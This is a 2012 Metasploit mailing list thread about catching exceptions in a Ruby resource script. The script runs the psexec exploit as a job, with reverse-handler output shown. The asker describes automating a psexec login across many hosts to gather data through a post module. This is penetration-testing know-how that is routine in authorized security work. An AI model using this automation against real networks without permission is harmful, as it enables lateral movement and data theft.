Metasploit mailing list archives
Re: Catching exploit exceptions in rc script
From: Joshua Smith <lazydj98 () gmail com>
Date: Tue, 26 Jun 2012 12:54:03 -0500
birchfresh and I were direct emailing, thought I would send this to the list: this works: <ruby> run_single("use exploit/windows/smb/psexec") run_single("set RHOST 1.1.1.1") # <-- this host doesn't exist begin run_single("exploit -j") rescue end </ruby> [*] resource (/msf/test.rc)> Ruby Code (126 bytes) RHOST => 1.1.1.1 [*] Exploit running as background job. [*] Started reverse handler on 192.168.100.101:4444 [*] Connecting to the server... <a while later> [-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (1.1.1.1:445). URule exploit(psexec) > jobs Jobs ==== No active jobs. URule exploit(psexec) > Something else to keep in mind, inside a ruby block (in an rc file) you're in a weird place in the framework (Msf::Ui::Console::Driver) cat test.rc <ruby> puts self.class </ruby> resource test.rc [*] Processing /msf/test.rc for ERB directives. [*] resource (/msf/test.rc)> Ruby Code (17 bytes) Msf::Ui::Console::Driver -kernelsmith On Jun 26, 2012, at 10:46 AM, birchfresh wrote:
Hello there. I'm using msfconsole (newest git) to run a rc script that's essentially something like: <ruby> run_single("use windows/smb/psexec") # [...] old_sessions = framework.sessions.keys.clone run_single("exploit -z") rescue nil # script stops here after exception! new_session = (old_sessions - framework.sessions.keys).first do_something_with(new_session) if new_session </ruby> My problem is that if the exploit raises an exception, the script refuses continue until I press ^C. Shouldn't "rescue nil" catch the exception? I tried to work around it by running the exploit as a background job (exploit -z -j) and waiting for framework.jobs.length to be decremented, but it's no good: If there's an exception, the job hangs around forever. For context, I'm doing the following to a number of hosts, one by one: Pivoted login with the psexec module, run a post module to gather some data, kill the session, move on to the next host. Is there a better way to open a session (and get its number) than to run_single("exploit -z") and poke around in framework.sessions.keys for newcomers? Or, as a last resort: Is there a way to tell if the exploit at framework.jobs[id] is dead? _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Catching exploit exceptions in rc script birchfresh (Jun 26)
- Re: Catching exploit exceptions in rc script Joshua Smith (Jun 26)
- Message not available
- Re: Catching exploit exceptions in rc script birchfresh (Jun 26)
- Re: Catching exploit exceptions in rc script Joshua Smith (Jun 26)
- Message not available
- Message not available
- Message not available
- Re: Catching exploit exceptions in rc script birchfresh (Jun 26)
- Message not available